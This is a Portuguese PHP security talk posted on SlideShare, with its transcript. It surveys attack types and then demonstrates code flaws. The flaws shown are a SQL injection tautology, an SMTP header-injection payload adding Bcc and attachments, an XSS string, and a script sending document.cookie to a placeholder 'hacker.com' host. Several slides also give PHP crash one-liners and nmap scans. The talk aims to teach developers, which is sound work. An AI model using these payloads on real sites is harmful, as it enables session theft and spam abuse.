SlideShare a Scribd company logo
1 of 37
Download to read offline
PHP Security
Ricardo Striquer Soares (ricardophp)
programabrasil.blogspot.com
Tecnicas de ataques
        Spam / Phising Scam
        Exploits / Backdoors
        Botnets
        Package Sniffing
        Scanning / Port scanning
        Social Enginering
        Spywares / Keylogger / Screenlogger
        DoS / DDoS
        DNS Poisoning
        Brute Force
http://en.wikipedia.org/wiki/Exploit_%28computer_security%29
Spam
       quot;It is worrisome that ... when
       transactions faced a stealthy
       attack, 61% of attacks were
       successful.quot;
                    QUT researcher Mohammed AlZomai
                               isi.qut.edu.au (Australia)




  http://www.sciencedaily.com/releases/2007/11/071107091540.htm
Spywares, Keylogger
   and Screenlogger




http://en.wikipedia.org/wiki/Spyware
Botnets
http://en.wikipedia.org/wiki/Botnets
Brute Force
while ( ! ( succeed = try() ) );




         http://en.wikipedia.org/wiki/Brute_force_attack
Exploits
      and Bugs
 php -r 'gettext(str_repeat(quot;Aquot;,8476509));'
 (v5.2.5)

 $a=str_repeat(quot;Aquot;, 65535);
 $b=1;
 $c=str_repeat(quot;Aquot;, 65535);
 chunk_split($a,$b,$c);
 (v5.2.1)

http://en.wikipedia.org/wiki/Exploit_%28computer_security%29
Com tudo isto ...
Scanning
and Port scanning
nmap -vsS
nmap -vP0 (zero)
nmap -vsV (exemplo de resultado abaixo)

PORT     STATE   SERVICE   VERSION
21/tcp   open    ftp       vsFTPd 2.0.4
22/tcp   open    ssh       OpenSSH 4.2p1 (protocol 2.0)
25/tcp   open    smtp      qmail smtpd
80/tcp   open    http      Apache httpd 1.3.34 ((Unix) PHP/4.4.2)


                    http://en.wikipedia.org/wiki/Nmap
Social
        Engineering

        “Estou retornando um chamado de
        suporte técnico e ...”


        “Estou fazendo uma
        pesquisa de satisfação ...”


http://en.wikipedia.org/wiki/Social_engineering_%28security%29
DNS Poisoning




   http://en.wikipedia.org/wiki/Dns_poisoning
DoS / DDoS
Denial of Service / Distributed DoS

Técnicas
  ICMP Floods => www.powertech.no/smurf
  Teardrop => OS Upgrade
  Pear-to-peer => PI*
  Application level floods => PI*
  Nuke => OS Upgrade

         http://en.wikipedia.org/wiki/Denial-of-service_attack
Direções

           www.securityfocus.com

           thedailywtf.com

           www.istf.com.br

           www.owasp.org
Notícias de ontem ...
Apple corrige 45 falhas no Mac OS X
http://info.abril.com.br/aberto/infonews/032007/14032007-10.shl


Cavalo-de-tróia rouba dados para venda na web
http://info.abril.com.br/aberto/infonews/032007/22032007-10.shl


Mozilla corrige nova falha no Firefox
http://info.abril.com.br/aberto/infonews/032007/21032007-24.shl


Falha no IE7 facilita ataques de phishing
http://info.abril.com.br/aberto/infonews/032007/15032007-8.shl
Oito em cada dez
sites de internet são
           inseguros.
Existia uma história de
quatro pessoas,
Todomundo, Alguém,
Qualquerum e Ninguém
...
“... Havia um importante trabalho para ser
     feito e Todomundo tinha certeza que
   Alguém faria-o. Qualquerum poderia ter
   feito mas Ninguém o fez. Agora quando
Alguém fica brabo por causa disto, pois era
trabalho de Todomundo, Todomundo pensa
    que Qualquerum deveria ter faito, mas
 Ninguém imaginou que Todomundo não o
                havia feito. ...”
... Ao fim
Todomundo culpa
Alguém quando
Ninguém fez o que
Qualquerum
poderia ter feito!

Texto do Escritório
de Segurança do
Departamento de
Comercio Norte
Americano
Segurança é um
fator cultural, é um
dever, é
responsabilidade
de todos!
O que deve um parceiro
de hospedagem fazer?
Controle de acesso

Politica de atualização

Utilizar SPF (Sender Police Framework)

IDS (Intrusion Detection System)


              http://www.antispam.br/admin/spf/
              http://www.rnp.br/newsgen/9909/ids.html
Projetos interessantes
 - Google code search
   Encontrar falhas em sistemas open source

 - Hardened Linux / OpenBSD
   Identificar padrões de configurações

 - Hardened PHP
   Implementar

 - GreenSQL
   Implementar                http://code.google.com/
                              http://hardenedlinux.sourceforge.net/
                              http://www.hardened-php.net/
                              http://www.greensql.net/
O que nós
programadores
podemos fazer?
Problemas de código
 Injections
 Session Hijacking
 XSS
 CSRF ou XSRF
Injections
    O que é um injection?

    Injections mais populares:
      SQL e SMTP




http://en.wikipedia.org/wiki/Code_injection
http://en.wikipedia.org/wiki/SQL_injection
Injections - SQL (1/3)
$db = new db();
                            $_GET[“login”] = “mayke”;



$db->SQL = '
   SELECT *
   FROM user
   WHERE login=”'.$_GET[“login”].'”;
';


$db->Execute();
Injections - SQL (2/3)
$db = new db();
                              $_GET[“login”] = “N”
                                       OR TRUE
                               OR login=”NONE”;


$db->SQL = '
   SELECT *
   FROM user
   WHERE login=”'.$_GET[“login”].'”;
';


$db->Execute();
Injections - SQL (3/3)
If ($db->QuantidadeResultados) {
   echo “Deu certo!”;
}


If ($db->QuantidadeResultados) {
   $db->SQL = '
      /* Novo comando com outro imput */
   ';
}
Injections - SMTP (1/4)
                        $_POST[“Para”] =
                        “destin@tario.com”;

                        $_POST[“Assunto”] =
                        “Ataque de spammers”;
mail(                   $_POST[“Mensagem”] =
   $_POST[“Para”],      “Atacaram nosso site!”;

   $_POST[“Assunto”],
   $_POST[“Mensagem”
);
Injections - SMTP (2/4)
      01   Dominio destino: tario.com               34   W: DATA
      02   Identificando MTAs disponiveis           35   S: 4 bytes
      03   Servidor selecionado: mx.tario.com       36   R: 354 go ahead
      04   Conexao socket estabelecida!             37   S: 12 bytes
      05   R: 220 mx01.tario.com ESMTP              38   T: 0.082557916641235 sec
      06   S: 35 bytes                              39
      07   T: 0.41055202484131 sec                  40   W: MIME-Version: 1.0
      08                                            41   X-SenderEngineVersion: 1.0
      09   W: EHLO lucremais.com                    42   X-SenderEngineName: Ideias Pontual - iMail
      10   S: 21 bytes                              43   Return-path: NomeFrom <script@site.com>
      11   R: 250-mx01.tario.com                    44   Content-Type: text/plain;
      12   S: 29 bytes                              45        charset=ISO-8859-1
      13   R: 250-PIPELINING                        46   Reply-to: NomeFrom <script@site.com>
      14   S: 14 bytes                              47   Date: Sat, 21 Jul 2007 13:53:15 -0300
      15   R: 250-8BITMIME                          48   From: NomeFrom <script@site.com>
      16   S: 12 bytes                              49   To: NomeTo <destin@tario.com>
      17   R: 250-SIZE 30000000                     50   Subject: Teste de envio texto!
      18   S: 17 bytes                              51
      19   R: 250 AUTH LOGIN PLAIN CRAM-MD5         52   Teste
      20   S: 29 bytes                              53   .
      21   T: 0.053061962127686 sec                 54   S: 379 bytes
      22                                            55   R: 250 ok 1185036797 qp 31968
      23   W: MAIL FROM: <script@site.com>          56   S: 26 bytes
      24   S: 28 bytes                              57   T: 0.20024585723877 sec
      25   R: 250 ok                                58
      26   S: 6 bytes                               59   W: QUIT
      27   T: 0.81833100318909 sec                  60   S: 4 bytes
      28                                            61   R: 221 mx01.tario.com
      29   W: RCPT TO: <destin@tario.com>           62   S: 29 bytes
      30   S: 36 bytes                              63   T: 0.044206857681274 sec
      31   R: 250 ok                                64
      32   S: 6 bytes                               65   Tempo total de envio: 1.6655600070953 sec
      33   T: 0.043802976608276 sec


      W=comando; R=resposta; S=Tamanho do texto; T=Milisegundos entre a escruta e a leitura
Injections - SMTP (3/4)
                        $_POST[“Para”] =
                        “haxor@attack.com%0ASubjec
                        t:Mwahahaha%0ABcc:target@
                        nothappy.com%0AContent-
                        Type:multipart/mixed;%20bou
mail(                   ndary=frog;%0A--
                        frog%0AContent-
   $_POST[“Para”],      Type:text/html%0A%0A<u>H
                        TML%20Message.</u>%0A%0
   $_POST[“Assunto”],   A--frog%0AContent-
                        Type:text/html;name=Security
   $_POST[“Mensagem”    .html;%0AContent-Transfer-
                        Encoding:8bit%0AContent-
);                      Disposition:attachment%0A%0
                        A<u>HTML%20File</u>%0A%
                        0A--frog--%0A”;

                        $_POST[“Assunto”] =
                        “Ataque de spammers”;

                        $_POST[“Mensagem”] =
                        “Atacaram nosso site!”;
Injections - SMTP (4/4)
                                    From: site@site.com
                                    Subject: Ataque de spammers
                                    To: haxor@attack.com
                                    Subject:Mwahahaha
                                    Bcc:target@nothappy.com
                                    Content-Type:multipart/mixed;
                                    boundary=frog;
01:   From: script@site.com         --frog
02:   Subject: Ataque de spammers   Content-Type:text/html
03:   To: destin@tario.com
04:                                 <b>HTML Message.</b>
05:   Atacaram nosso site!
06:                                 --frog--
07:   .                             Content-
                                    Type:text/html;name=Security.html;
                                    Content-Transfer-Encoding:8bit
                                    Content-Disposition: attachment

                                    <u>HTML File</u>

                                    --frog--

                                    Atacaram nosso site!

                                    .
Session Hijacking

Session fixation (bookmark)

Sedejacking (sniffing)

XSS e CSRF




             http://en.wikipedia.org/wiki/Session_hijacking
XSS
 Cross Site Scripting

 Também referenciado como CSS


                       $_POST[“msg'] =
                       '<h4><font color=red>Este
                       site foi
                       hackeado!</font></h4>'


         http://en.wikipedia.org/wiki/Cross_site_scripting
CSRF (ou XSRF)
 Cross Site Request Forgering


<script>
 window.location=
 'http://www.hacker.com?' +
 document.cookie
</script>


         http://en.wikipedia.org/wiki/Cross-site_request_forgery
*IMPORTANTE*
            $_GET
                      $_POST
$_COOKIES




                      $_SERVER
 $_ENV
            $_FILES
Segurança é um
fator cultural, é um
dever, é
responsabilidade
de todos!
Fim!

Agradecimentos Sites úteis

                www.php.net/security
ProPHP
                www.php-security.org
Tempo Real
                blog.php-security.org
idéias.ual
                phpsec.org
                www.phpsecure.info
                programabrasil.blogspot.com

More Related Content

What's hot

[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
CODE BLUE
 
02 banking trojans-thomassiebert
02 banking trojans-thomassiebert02 banking trojans-thomassiebert
02 banking trojans-thomassiebert
geeksec80
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 

What's hot (20)

Py conkr 20150829_docker-python
Py conkr 20150829_docker-pythonPy conkr 20150829_docker-python
Py conkr 20150829_docker-python
 
Http capturing
Http capturingHttp capturing
Http capturing
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
 
ZeroMQ Is The Answer
ZeroMQ Is The AnswerZeroMQ Is The Answer
ZeroMQ Is The Answer
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Redis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your applicationRedis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your application
 
Backtrack Manual Part5
Backtrack Manual Part5Backtrack Manual Part5
Backtrack Manual Part5
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Cracking Salted Hashes
Cracking Salted HashesCracking Salted Hashes
Cracking Salted Hashes
 
mod_perl 2.0 For Speed Freaks!
mod_perl 2.0 For Speed Freaks!mod_perl 2.0 For Speed Freaks!
mod_perl 2.0 For Speed Freaks!
 
RestMQ - HTTP/Redis based Message Queue
RestMQ - HTTP/Redis based Message QueueRestMQ - HTTP/Redis based Message Queue
RestMQ - HTTP/Redis based Message Queue
 
Phd3
Phd3Phd3
Phd3
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
02 banking trojans-thomassiebert
02 banking trojans-thomassiebert02 banking trojans-thomassiebert
02 banking trojans-thomassiebert
 
PDX Tech Meetup - The changing landscape of passwords
PDX Tech Meetup - The changing landscape of passwordsPDX Tech Meetup - The changing landscape of passwords
PDX Tech Meetup - The changing landscape of passwords
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
 
Dtalk shell
Dtalk shellDtalk shell
Dtalk shell
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 

Similar to Php Security

us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
sonjeku1
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
guestad13b55
 

Similar to Php Security (20)

Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
 
Playing 44CON CTF for fun and profit
Playing 44CON CTF for fun and profitPlaying 44CON CTF for fun and profit
Playing 44CON CTF for fun and profit
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 Mars
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Common Browser Hijacking Methods
Common Browser Hijacking MethodsCommon Browser Hijacking Methods
Common Browser Hijacking Methods
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]Jose Selvi - Side-Channels Uncovered [rootedvlc2018]
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]
 
200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
The HTML5 WebSocket API
The HTML5 WebSocket APIThe HTML5 WebSocket API
The HTML5 WebSocket API
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 

More from ricardophp

More from ricardophp (6)

XSS Desvendado
XSS DesvendadoXSS Desvendado
XSS Desvendado
 
PHPUnit e teste de software
PHPUnit e teste de softwarePHPUnit e teste de software
PHPUnit e teste de software
 
Xss Desvendado!
Xss Desvendado!Xss Desvendado!
Xss Desvendado!
 
Mercado De Trabalho Curitibano
Mercado De Trabalho CuritibanoMercado De Trabalho Curitibano
Mercado De Trabalho Curitibano
 
A Biblioteca cURL
A Biblioteca cURLA Biblioteca cURL
A Biblioteca cURL
 
[Especial Conisli] Projetos De Software Em Uma Pequena Empresa
[Especial Conisli] Projetos De Software Em Uma Pequena Empresa[Especial Conisli] Projetos De Software Em Uma Pequena Empresa
[Especial Conisli] Projetos De Software Em Uma Pequena Empresa
 

Recently uploaded

TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc
 
Revolutionizing SAP® Processes with Automation and Artificial Intelligence
Revolutionizing SAP® Processes with Automation and Artificial IntelligenceRevolutionizing SAP® Processes with Automation and Artificial Intelligence
Revolutionizing SAP® Processes with Automation and Artificial Intelligence
Precisely
 

Recently uploaded (20)

Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform Engineering
 
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxCyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
 
Long journey of Ruby Standard library at RubyKaigi 2024
Long journey of Ruby Standard library at RubyKaigi 2024Long journey of Ruby Standard library at RubyKaigi 2024
Long journey of Ruby Standard library at RubyKaigi 2024
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
UiPath manufacturing technology benefits and AI overview
UiPath manufacturing technology benefits and AI overviewUiPath manufacturing technology benefits and AI overview
UiPath manufacturing technology benefits and AI overview
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - Questionnaire
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!
 
Top 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTop 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development Companies
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
TopCryptoSupers 12thReport OrionX May2024
TopCryptoSupers 12thReport OrionX May2024TopCryptoSupers 12thReport OrionX May2024
TopCryptoSupers 12thReport OrionX May2024
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptx
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage Intacct
 
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
 
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptx
 
Portal Kombat : extension du réseau de propagande russe
Portal Kombat : extension du réseau de propagande russePortal Kombat : extension du réseau de propagande russe
Portal Kombat : extension du réseau de propagande russe
 
Revolutionizing SAP® Processes with Automation and Artificial Intelligence
Revolutionizing SAP® Processes with Automation and Artificial IntelligenceRevolutionizing SAP® Processes with Automation and Artificial Intelligence
Revolutionizing SAP® Processes with Automation and Artificial Intelligence
 

Php Security

  • 1. PHP Security Ricardo Striquer Soares (ricardophp) programabrasil.blogspot.com
  • 2. Tecnicas de ataques Spam / Phising Scam Exploits / Backdoors Botnets Package Sniffing Scanning / Port scanning Social Enginering Spywares / Keylogger / Screenlogger DoS / DDoS DNS Poisoning Brute Force http://en.wikipedia.org/wiki/Exploit_%28computer_security%29
  • 3. Spam quot;It is worrisome that ... when transactions faced a stealthy attack, 61% of attacks were successful.quot; QUT researcher Mohammed AlZomai isi.qut.edu.au (Australia) http://www.sciencedaily.com/releases/2007/11/071107091540.htm
  • 4. Spywares, Keylogger and Screenlogger http://en.wikipedia.org/wiki/Spyware
  • 6. Brute Force while ( ! ( succeed = try() ) ); http://en.wikipedia.org/wiki/Brute_force_attack
  • 7. Exploits and Bugs php -r 'gettext(str_repeat(quot;Aquot;,8476509));' (v5.2.5) $a=str_repeat(quot;Aquot;, 65535); $b=1; $c=str_repeat(quot;Aquot;, 65535); chunk_split($a,$b,$c); (v5.2.1) http://en.wikipedia.org/wiki/Exploit_%28computer_security%29
  • 9. Scanning and Port scanning nmap -vsS nmap -vP0 (zero) nmap -vsV (exemplo de resultado abaixo) PORT STATE SERVICE VERSION 21/tcp open ftp vsFTPd 2.0.4 22/tcp open ssh OpenSSH 4.2p1 (protocol 2.0) 25/tcp open smtp qmail smtpd 80/tcp open http Apache httpd 1.3.34 ((Unix) PHP/4.4.2) http://en.wikipedia.org/wiki/Nmap
  • 10. Social Engineering “Estou retornando um chamado de suporte técnico e ...” “Estou fazendo uma pesquisa de satisfação ...” http://en.wikipedia.org/wiki/Social_engineering_%28security%29
  • 11. DNS Poisoning http://en.wikipedia.org/wiki/Dns_poisoning
  • 12. DoS / DDoS Denial of Service / Distributed DoS Técnicas ICMP Floods => www.powertech.no/smurf Teardrop => OS Upgrade Pear-to-peer => PI* Application level floods => PI* Nuke => OS Upgrade http://en.wikipedia.org/wiki/Denial-of-service_attack
  • 13. Direções www.securityfocus.com thedailywtf.com www.istf.com.br www.owasp.org
  • 14. Notícias de ontem ... Apple corrige 45 falhas no Mac OS X http://info.abril.com.br/aberto/infonews/032007/14032007-10.shl Cavalo-de-tróia rouba dados para venda na web http://info.abril.com.br/aberto/infonews/032007/22032007-10.shl Mozilla corrige nova falha no Firefox http://info.abril.com.br/aberto/infonews/032007/21032007-24.shl Falha no IE7 facilita ataques de phishing http://info.abril.com.br/aberto/infonews/032007/15032007-8.shl
  • 15. Oito em cada dez sites de internet são inseguros.
  • 16. Existia uma história de quatro pessoas, Todomundo, Alguém, Qualquerum e Ninguém ...
  • 17. “... Havia um importante trabalho para ser feito e Todomundo tinha certeza que Alguém faria-o. Qualquerum poderia ter feito mas Ninguém o fez. Agora quando Alguém fica brabo por causa disto, pois era trabalho de Todomundo, Todomundo pensa que Qualquerum deveria ter faito, mas Ninguém imaginou que Todomundo não o havia feito. ...”
  • 18. ... Ao fim Todomundo culpa Alguém quando Ninguém fez o que Qualquerum poderia ter feito! Texto do Escritório de Segurança do Departamento de Comercio Norte Americano
  • 19. Segurança é um fator cultural, é um dever, é responsabilidade de todos!
  • 20. O que deve um parceiro de hospedagem fazer? Controle de acesso Politica de atualização Utilizar SPF (Sender Police Framework) IDS (Intrusion Detection System) http://www.antispam.br/admin/spf/ http://www.rnp.br/newsgen/9909/ids.html
  • 21. Projetos interessantes - Google code search Encontrar falhas em sistemas open source - Hardened Linux / OpenBSD Identificar padrões de configurações - Hardened PHP Implementar - GreenSQL Implementar http://code.google.com/ http://hardenedlinux.sourceforge.net/ http://www.hardened-php.net/ http://www.greensql.net/
  • 23. Problemas de código Injections Session Hijacking XSS CSRF ou XSRF
  • 24. Injections O que é um injection? Injections mais populares: SQL e SMTP http://en.wikipedia.org/wiki/Code_injection http://en.wikipedia.org/wiki/SQL_injection
  • 25. Injections - SQL (1/3) $db = new db(); $_GET[“login”] = “mayke”; $db->SQL = ' SELECT * FROM user WHERE login=”'.$_GET[“login”].'”; '; $db->Execute();
  • 26. Injections - SQL (2/3) $db = new db(); $_GET[“login”] = “N” OR TRUE OR login=”NONE”; $db->SQL = ' SELECT * FROM user WHERE login=”'.$_GET[“login”].'”; '; $db->Execute();
  • 27. Injections - SQL (3/3) If ($db->QuantidadeResultados) { echo “Deu certo!”; } If ($db->QuantidadeResultados) { $db->SQL = ' /* Novo comando com outro imput */ '; }
  • 28. Injections - SMTP (1/4) $_POST[“Para”] = “destin@tario.com”; $_POST[“Assunto”] = “Ataque de spammers”; mail( $_POST[“Mensagem”] = $_POST[“Para”], “Atacaram nosso site!”; $_POST[“Assunto”], $_POST[“Mensagem” );
  • 29. Injections - SMTP (2/4) 01 Dominio destino: tario.com 34 W: DATA 02 Identificando MTAs disponiveis 35 S: 4 bytes 03 Servidor selecionado: mx.tario.com 36 R: 354 go ahead 04 Conexao socket estabelecida! 37 S: 12 bytes 05 R: 220 mx01.tario.com ESMTP 38 T: 0.082557916641235 sec 06 S: 35 bytes 39 07 T: 0.41055202484131 sec 40 W: MIME-Version: 1.0 08 41 X-SenderEngineVersion: 1.0 09 W: EHLO lucremais.com 42 X-SenderEngineName: Ideias Pontual - iMail 10 S: 21 bytes 43 Return-path: NomeFrom <script@site.com> 11 R: 250-mx01.tario.com 44 Content-Type: text/plain; 12 S: 29 bytes 45 charset=ISO-8859-1 13 R: 250-PIPELINING 46 Reply-to: NomeFrom <script@site.com> 14 S: 14 bytes 47 Date: Sat, 21 Jul 2007 13:53:15 -0300 15 R: 250-8BITMIME 48 From: NomeFrom <script@site.com> 16 S: 12 bytes 49 To: NomeTo <destin@tario.com> 17 R: 250-SIZE 30000000 50 Subject: Teste de envio texto! 18 S: 17 bytes 51 19 R: 250 AUTH LOGIN PLAIN CRAM-MD5 52 Teste 20 S: 29 bytes 53 . 21 T: 0.053061962127686 sec 54 S: 379 bytes 22 55 R: 250 ok 1185036797 qp 31968 23 W: MAIL FROM: <script@site.com> 56 S: 26 bytes 24 S: 28 bytes 57 T: 0.20024585723877 sec 25 R: 250 ok 58 26 S: 6 bytes 59 W: QUIT 27 T: 0.81833100318909 sec 60 S: 4 bytes 28 61 R: 221 mx01.tario.com 29 W: RCPT TO: <destin@tario.com> 62 S: 29 bytes 30 S: 36 bytes 63 T: 0.044206857681274 sec 31 R: 250 ok 64 32 S: 6 bytes 65 Tempo total de envio: 1.6655600070953 sec 33 T: 0.043802976608276 sec W=comando; R=resposta; S=Tamanho do texto; T=Milisegundos entre a escruta e a leitura
  • 30. Injections - SMTP (3/4) $_POST[“Para”] = “haxor@attack.com%0ASubjec t:Mwahahaha%0ABcc:target@ nothappy.com%0AContent- Type:multipart/mixed;%20bou mail( ndary=frog;%0A-- frog%0AContent- $_POST[“Para”], Type:text/html%0A%0A<u>H TML%20Message.</u>%0A%0 $_POST[“Assunto”], A--frog%0AContent- Type:text/html;name=Security $_POST[“Mensagem” .html;%0AContent-Transfer- Encoding:8bit%0AContent- ); Disposition:attachment%0A%0 A<u>HTML%20File</u>%0A% 0A--frog--%0A”; $_POST[“Assunto”] = “Ataque de spammers”; $_POST[“Mensagem”] = “Atacaram nosso site!”;
